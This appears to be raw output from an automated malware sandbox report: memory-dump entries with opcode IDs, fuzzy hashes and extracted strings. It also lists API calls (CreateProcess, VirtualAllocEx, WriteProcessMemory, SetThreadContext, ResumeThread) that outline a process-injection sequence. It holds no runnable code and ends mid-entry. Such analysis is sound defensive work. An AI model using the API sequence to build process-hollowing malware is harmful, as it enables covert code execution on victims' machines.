                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f874f7dd61e8ecf6afbfff6ff851b0664ab835e0b4c4ef856019a2d79e917aaf
                                                                                        • Instruction ID: edc711e127a27c1f2c763ab58321fdbd092f0e421f5f0c9707110cf1881e76ed
                                                                                        • Opcode Fuzzy Hash: f874f7dd61e8ecf6afbfff6ff851b0664ab835e0b4c4ef856019a2d79e917aaf
                                                                                        • Instruction Fuzzy Hash: E4D05E30C5520CDBC704EFE4E8416ADBBB8AB42309F2052A8D80823350DB705E90DA95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 350430cb834b4355ea7882e5ff863484757e8e841f3a39da00260656353297a6
                                                                                        • Instruction ID: ad6b8e3736df0e2f7d9b26f9ba70c4c81c81a6fc8faf36a1db2b6b6216557187
                                                                                        • Opcode Fuzzy Hash: 350430cb834b4355ea7882e5ff863484757e8e841f3a39da00260656353297a6
                                                                                        • Instruction Fuzzy Hash: 9ED01774A912898B8B90CBE1E54088DFBB2AB85390F20C8658406AB228E634C5858F04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 89a39d93aa882e3aa1b74d131379c348e3a33932c80b85d2b2e4076b7d74468b
                                                                                        • Instruction ID: 879f16afc3bae895e74faacf7e77df135e1a8094929bcefdd6be87a9dfe6d770
                                                                                        • Opcode Fuzzy Hash: 89a39d93aa882e3aa1b74d131379c348e3a33932c80b85d2b2e4076b7d74468b
                                                                                        • Instruction Fuzzy Hash: 22D05EB0E1520D8F8B90DFA4E18489DB7B6EB853A0B20D86AD015E7324D374DA068F18
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 618ecf9bfc0112ecff01cbdad037c83dfd4f56e3c08be6131b20bfc692064a2c
                                                                                        • Instruction ID: 493ce5837613d02a733b1a3144cd9b0dc115b957eb355ea3d783d5fe8271c74c
                                                                                        • Opcode Fuzzy Hash: 618ecf9bfc0112ecff01cbdad037c83dfd4f56e3c08be6131b20bfc692064a2c
                                                                                        • Instruction Fuzzy Hash: ABD0C971A12294CFC754CFA0C644858BBB2AF49301B6444AAD10A9A268D735E984CA04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.2334592153.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8cc267d0ab1619e520509a58f7ac15f2758dbc72d7d284e4d1adef5d214fe8c8
                                                                                        • Instruction ID: 719cfa9086febfc3305a918cdbe6c431a9ffd140810582ce252d2cb6e8d54374
                                                                                        • Opcode Fuzzy Hash: 8cc267d0ab1619e520509a58f7ac15f2758dbc72d7d284e4d1adef5d214fe8c8
                                                                                        • Instruction Fuzzy Hash: A9C08C309202858FC704CBE0C98449DFBB0BF89300B68882A9003DA078D23048408B20
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Executed Functions

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: TNBl
                                                                                        • API String ID: 0-2573526999
                                                                                        • Opcode ID: bc4bfab8a373e1e448b88dd3a18912c9244e87818d940140ef9b705b5ffb857d
                                                                                        • Instruction ID: 22dbf1e0916d0b2e390134cec16dc14665369f6dd1d09f11f712f3baa6f14bed
                                                                                        • Opcode Fuzzy Hash: bc4bfab8a373e1e448b88dd3a18912c9244e87818d940140ef9b705b5ffb857d
                                                                                        • Instruction Fuzzy Hash: CA23D434A00619CFC714EB64C998EE9B7B2BF8A305F1145E9D409AB361DB35AEC9CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: TNBl
                                                                                        • API String ID: 0-2573526999
                                                                                        • Opcode ID: 58cf0304c1a3bc3d3d3c207b26fbafe6cafde07289cdcab2482920e5499ff7f8
                                                                                        • Instruction ID: 999532fea719ecce0cb34c84e707952ae8c4007fc284a08c930eefb7801b396f
                                                                                        • Opcode Fuzzy Hash: 58cf0304c1a3bc3d3d3c207b26fbafe6cafde07289cdcab2482920e5499ff7f8
                                                                                        • Instruction Fuzzy Hash: 5223D434A00619CFC714EB64C998EE9B7B2BF8A305F1145E9D409AB361DB35AEC9CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: TNBl
                                                                                        • API String ID: 0-2573526999
                                                                                        • Opcode ID: ad7f8154773cfb79a6f09ff4dfdf011405075dbfc36fe155f3f70c88a7ad64f6
                                                                                        • Instruction ID: dc16e1cc01afed16faa7c103614d97d15e7b48c55181e5ee09d14f0208f99ffd
                                                                                        • Opcode Fuzzy Hash: ad7f8154773cfb79a6f09ff4dfdf011405075dbfc36fe155f3f70c88a7ad64f6
                                                                                        • Instruction Fuzzy Hash: 97D2C438A00619CFC715DB24C998EE9B7B1FF8A305F1145E9E409AB361DB35AE89CF44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n
                                                                                        • API String ID: 0-2795774880
                                                                                        • Opcode ID: e45717eddad0ed643b387d6ba706f01da2c08a903bac4a94ec5dd19e3e76c6cd
                                                                                        • Instruction ID: 8fab93a6d593e0ad354d8de5c543d2395a2da0b0108a6b9e029bae808e9ad7b6
                                                                                        • Opcode Fuzzy Hash: e45717eddad0ed643b387d6ba706f01da2c08a903bac4a94ec5dd19e3e76c6cd
                                                                                        • Instruction Fuzzy Hash: 65F19C70D2934ACFCB14CFA5C8958AEFBB2FF89310B54C45AC41AAB655C7349942CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n
                                                                                        • API String ID: 0-2795774880
                                                                                        • Opcode ID: 44b202b87d2aa4c8ceb4ef95e84426f9cf06da0a87849629e1e2d80650b9d21f
                                                                                        • Instruction ID: 108c72dd3d74817542c79a10e3670567601b386289949c52f4aff0322077d3a0
                                                                                        • Opcode Fuzzy Hash: 44b202b87d2aa4c8ceb4ef95e84426f9cf06da0a87849629e1e2d80650b9d21f
                                                                                        • Instruction Fuzzy Hash: 77D17B70E2520ADFCB14CFA5C4808AEFBB2FF88311F60D559D41AAB615D734AA52CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: n
                                                                                        • API String ID: 0-2795774880
                                                                                        • Opcode ID: d44623a4aaa7c560b412b31505b16224cbc8c24a03d3433b939f077200f8c50a
                                                                                        • Instruction ID: 4ce35233c93242acc19cd945de0f8ba3e6e8513d5c715ae28beb73f24e005d29
                                                                                        • Opcode Fuzzy Hash: d44623a4aaa7c560b412b31505b16224cbc8c24a03d3433b939f077200f8c50a
                                                                                        • Instruction Fuzzy Hash: 6FD18C70E2520ACFCB14CFA5C4808AEFBB2FF88311F60D559C41AAB655D734AA52CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 08543d3bac5612adbb25697ece6daa0767de844b125eebc8bbb635ba659ccd1d
                                                                                        • Instruction ID: fe2f12fa9dd4429e5d51d2abc2f11b9e6b719785d0904dad6b95a1266958bd01
                                                                                        • Opcode Fuzzy Hash: 08543d3bac5612adbb25697ece6daa0767de844b125eebc8bbb635ba659ccd1d
                                                                                        • Instruction Fuzzy Hash: F4A148B1E1525ACFDB08CFA9C8946DEFBF2EF89300F24842AD415AB265D7345816CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 47cffa69488453534698cf05d3314360ff0893dedcf1d969b609ba90ce84f3b0
                                                                                        • Instruction ID: 14a796850d26a20f2fa796fb4186b58fcde25b197e40ca00a6d4a9c6fdf2f9c5
                                                                                        • Opcode Fuzzy Hash: 47cffa69488453534698cf05d3314360ff0893dedcf1d969b609ba90ce84f3b0
                                                                                        • Instruction Fuzzy Hash: B781E5B4E11218CFDB08CFEAC88469EBBB2EF88300F24942AD519BB364DB755951CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3036a39526ded2fb314672333d2fe2d9ea95950cdf0d9f7d345c0cc3ba6b1912
                                                                                        • Instruction ID: 07bf670691909a31c540ce4e24d5aef785577f30230b812f301a65713746e73f
                                                                                        • Opcode Fuzzy Hash: 3036a39526ded2fb314672333d2fe2d9ea95950cdf0d9f7d345c0cc3ba6b1912
                                                                                        • Instruction Fuzzy Hash: F381E575E002189FDB18DFA5D990ADEBBB2FF88304F208169E519AB365DB315D41CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 396d59f3b6cc8163d32cdd62e3dce93c0c52d083f67990b561c33d6dfcded93b
                                                                                        • Instruction ID: b2462b41664497056aa02184568bdf72661720cca14e9c135e41e49e2626a711
                                                                                        • Opcode Fuzzy Hash: 396d59f3b6cc8163d32cdd62e3dce93c0c52d083f67990b561c33d6dfcded93b
                                                                                        • Instruction Fuzzy Hash: B881D575E002189FDB18DFA5D990ADEBBB2FF88300F208569E519AB365DB315D41CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4e9d65e98a6976aaa7edfb9505e430828c1c4715183682dab5f75d78f76a328c
                                                                                        • Instruction ID: 9cb7aba49ae9576c308f178c7074e57bd8cd4f25aded47233445527cf5e0113c
                                                                                        • Opcode Fuzzy Hash: 4e9d65e98a6976aaa7edfb9505e430828c1c4715183682dab5f75d78f76a328c
                                                                                        • Instruction Fuzzy Hash: BF615D71D14609CFDB08CFEAC4446AEFBF2AF89300F24D46AD419A7254D7748A528FA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 961b503e3c4b32e72671cfe4e5b4d44620312f8b5d41a9a38e07cf4de0aa657a
                                                                                        • Instruction ID: 46d3b56e34c1c56ac4608bd5eb7d4bf63b8922ece249bc1f6575880afe739a57
                                                                                        • Opcode Fuzzy Hash: 961b503e3c4b32e72671cfe4e5b4d44620312f8b5d41a9a38e07cf4de0aa657a
                                                                                        • Instruction Fuzzy Hash: 7D51E274E05219DFDB04DFA9C580AEEFBF2AF88304F24C56AD518AB255D7349942CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 00152a2adfdf034ad6e0f28480f2cf54008320424fa714dd302d1baea3135706
                                                                                        • Instruction ID: 25f0c54c47dc23440a4af7ec0b0e30fbd185f4495e56950f8640025629d4e6ec
                                                                                        • Opcode Fuzzy Hash: 00152a2adfdf034ad6e0f28480f2cf54008320424fa714dd302d1baea3135706
                                                                                        • Instruction Fuzzy Hash: 6331F971E056188FEB58CFAAD84469EBBF3AFC8300F14C5BAD408A7264EB301A458F51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3c9eb470c57e670cebda7928d859100f5f0c6ae5b9d604ff22b8c904811aa9c6
                                                                                        • Instruction ID: 8814444f49e42e020e9b8f4ec1c0b8136ea9ed8bc87b702ada090e8c35d423a1
                                                                                        • Opcode Fuzzy Hash: 3c9eb470c57e670cebda7928d859100f5f0c6ae5b9d604ff22b8c904811aa9c6
                                                                                        • Instruction Fuzzy Hash: F7212471E006588BDB19CFABD84039EFBF7AFC9310F14C06AD408A6268DB341995CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PJBl$PJBl$PJBl$PJBl$PJBl$PJBl$TNBl
                                                                                        • API String ID: 0-2498673735
                                                                                        • Opcode ID: e71eb1585d688ea5ccbc0283b61a2219baca88a8a8da481ee6228ebf225e0b6a
                                                                                        • Instruction ID: 12f12fc01b1ea1fc320aa1648f7cc20f228df82a8dcdffcabf5b1c990b42ec13
                                                                                        • Opcode Fuzzy Hash: e71eb1585d688ea5ccbc0283b61a2219baca88a8a8da481ee6228ebf225e0b6a
                                                                                        • Instruction Fuzzy Hash: 7822C334E10219CFDB24DFA4C881BDDB7B2AF49304F1186AAD919AB351DB30AE95CF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: PJBl$PJBl$PJBl$TNBl
                                                                                        • API String ID: 0-3017763876
                                                                                        • Opcode ID: fe637218f303dbe6439706da6d4e44cb4e6ce2ffad848379474c4bc4072df3f4
                                                                                        • Instruction ID: 63eeb62e669e89df22af81646d2405625b55e45fe310d9a94f6273a9877e41f2
                                                                                        • Opcode Fuzzy Hash: fe637218f303dbe6439706da6d4e44cb4e6ce2ffad848379474c4bc4072df3f4
                                                                                        • Instruction Fuzzy Hash: 0D12C274E00219CFDB24DFA8C845BD9B7B2AF49304F1085EAD819A7361DB30AE95DF51
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (+@m$l0@m
                                                                                        • API String ID: 0-704468455
                                                                                        • Opcode ID: 197544b5d501d30c4b12d80ffd23ccfa584526e41be2fee9bdbf53db21cff4e2
                                                                                        • Instruction ID: 2fdccc7049d61844b96c3bffc0ba548d2a36cf0d562fcae082a5384bf9e6b7e3
                                                                                        • Opcode Fuzzy Hash: 197544b5d501d30c4b12d80ffd23ccfa584526e41be2fee9bdbf53db21cff4e2
                                                                                        • Instruction Fuzzy Hash: 0D91F274E10228CFDB14DFA9C998BADBBB2BF49304F208469D40AAB3A5DB745D45CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `!?m$`!?m
                                                                                        • API String ID: 0-952261428
                                                                                        • Opcode ID: 12e1629ff92500ef1abc78d5e647ae18f95910fd0e907d9df87079fe292780b8
                                                                                        • Instruction ID: 0d59d34c432ac578c1e6993b5ceada2651338ea75bd1b83f9c0dae944f840a57
                                                                                        • Opcode Fuzzy Hash: 12e1629ff92500ef1abc78d5e647ae18f95910fd0e907d9df87079fe292780b8
                                                                                        • Instruction Fuzzy Hash: 6F31DEB4D14609CFCB1ADFAAC8486EEBBB1FB8D304F14D46AD859A3250D7340951CF64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4D24
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: add67ef055cd234619197a20d1073797ac8cdc7534108bfcb5f1305092b6c0e4
                                                                                        • Instruction ID: 66cf15cff4159d5db20faafc40e6ab03e6957516dc63698f2ae4b304e431351a
                                                                                        • Opcode Fuzzy Hash: add67ef055cd234619197a20d1073797ac8cdc7534108bfcb5f1305092b6c0e4
                                                                                        • Instruction Fuzzy Hash: 0481DF74C00269CFDB21CFA4C940BEEBBB6BF19304F1095AAE519B7250DB309A89CF54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D53DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: a90cb6d837a2ea571fb2f95da50c8cc3a19780c5d9e4320c83e105b67748ea98
                                                                                        • Instruction ID: eb1dd23d367511ab4ccd8c462dda5190a85393aacec2b95cad7861d875911e95
                                                                                        • Opcode Fuzzy Hash: a90cb6d837a2ea571fb2f95da50c8cc3a19780c5d9e4320c83e105b67748ea98
                                                                                        • Instruction Fuzzy Hash: E24188B5D012589FCF00CFA9D984ADEFBF1BB49314F24902AE818B7210D374AA45CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D53DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: d84252ec90f3268f61a69d790c2f6ca2ce9d33933672c1762bd0b3508ed0567d
                                                                                        • Instruction ID: 740ed084eeaac981b133f7e20d116f44b5b864892616c943135fb7806f87b95d
                                                                                        • Opcode Fuzzy Hash: d84252ec90f3268f61a69d790c2f6ca2ce9d33933672c1762bd0b3508ed0567d
                                                                                        • Instruction Fuzzy Hash: 974176B5D002589FCF10CFA9D984ADEFBF1BB49314F24902AE818B7210D375AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D517D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 4966cc2fe0cbb78c9321530d32c3ce43ff4d0f76a4a8c054eebd3478a42ebd61
                                                                                        • Instruction ID: e0f375d0086044586d6e811d51a684f43ddf8715e1f2e3f1439171173aa81ae3
                                                                                        • Opcode Fuzzy Hash: 4966cc2fe0cbb78c9321530d32c3ce43ff4d0f76a4a8c054eebd3478a42ebd61
                                                                                        • Instruction Fuzzy Hash: F74196B8D04258DFCF10CFA9D884ADEFBB1BB59310F20902AE824B7210D335AA45CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D529D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 7d838b4c30d8242b1aaae9229ae26f75c0da056e28f660905ebfc03c3dff8655
                                                                                        • Instruction ID: 95cbcfc91e851d78e20c79231a5a12085caa21524ff4f8a189abc577fd091173
                                                                                        • Opcode Fuzzy Hash: 7d838b4c30d8242b1aaae9229ae26f75c0da056e28f660905ebfc03c3dff8655
                                                                                        • Instruction Fuzzy Hash: 894166B9D04258DFCF10CFA9D884A9EBBB5BB5A310F20942AE815B7310D335A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D529D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: a5283c476fe530c47067b30a2296aa455991507ae916a3245befefc1f2571570
                                                                                        • Instruction ID: 89075a08de1e95650c4c7b3ae99ebc7a8b0ebc96834720251a5243c339c335de
                                                                                        • Opcode Fuzzy Hash: a5283c476fe530c47067b30a2296aa455991507ae916a3245befefc1f2571570
                                                                                        • Instruction Fuzzy Hash: 793166B8D04258DFCF10CFA9D884A9EBBB5BB59310F20941AE815B7310D335A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001D505A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 968ce6b3f1ec4c5f7ce64b08f26283a3354810d5f50c20996fee85603894c7b2
                                                                                        • Instruction ID: 04c19ffa0e74a6a2a7fe9096659b2173940b7e140e35593b75ccd99d72e0ea3f
                                                                                        • Opcode Fuzzy Hash: 968ce6b3f1ec4c5f7ce64b08f26283a3354810d5f50c20996fee85603894c7b2
                                                                                        • Instruction Fuzzy Hash: 2141A8B5D012189FCB10CFA9D884ADEFBF5BB49314F24906AE418B7310D379AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 001D505A
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 18fea0b5d478381d8b68a1b501640be2356adc33d495e429737da1d27ce10067
                                                                                        • Instruction ID: c3dbd7649737dffd27bca67a87014b28b63639a2d7742a9385aba007b925b218
                                                                                        • Opcode Fuzzy Hash: 18fea0b5d478381d8b68a1b501640be2356adc33d495e429737da1d27ce10067
                                                                                        • Instruction Fuzzy Hash: 6B4199B4D012189FCB10CFA9D884ADEFBF5BB49314F24942AE418B7310D775AA45CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 001D55B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 525eb563d6dc976ffb8b36161206e14f60ffbda2c10885c23a98a183ec205209
                                                                                        • Instruction ID: d4eca648f2cfeec3d140126ec0270f5985d53f7d8ad17d8db37f9d183af045a6
                                                                                        • Opcode Fuzzy Hash: 525eb563d6dc976ffb8b36161206e14f60ffbda2c10885c23a98a183ec205209
                                                                                        • Instruction Fuzzy Hash: 7C31CDB4D042089FCB10CFA9E884ADEFBF1AF59314F24945AE815B7310D375A946CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ResumeThread.KERNELBASE(?), ref: 001D55B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333774206.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID:
                                                                                        • API String ID: 947044025-0
                                                                                        • Opcode ID: 38ee972814e54655dd182ae4f8752c5e1cec79628a5167c10de13f0e20aee347
                                                                                        • Instruction ID: bd0a9ccddc842343611d29cb8c29929b6dc51a595ff8c36ab6b6eaa6113e9a72
                                                                                        • Opcode Fuzzy Hash: 38ee972814e54655dd182ae4f8752c5e1cec79628a5167c10de13f0e20aee347
                                                                                        • Instruction Fuzzy Hash: 8F31A9B8D002089FCB10CFA9E884ADEFBF5AB49314F24945AE819B3310D775A941CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2333835167.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: t?m
                                                                                        • API String ID: 0-326825507
                                                                                        • Opcode ID: 539b64b8ca2e4d0d427026deacf17401ae7adc6dad682b0d3b81b2edd094cfbb
                                                                                        • Instruction ID: b37e6f66e8bd8dd0667dbdd457b670b4a2e03387e98476f0e79264c1ffc5e941
                                                                                        • Opcode Fuzzy Hash: 539b64b8ca2e4d0d427026deacf17401ae7adc6dad682b0d3b81b2edd094cfbb
                                                                                        • Instruction Fuzzy Hash: 4B910370D04219DFDB24CFA9C884BDDFBB2BF89304F1484A9D508AB252DB315A85CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
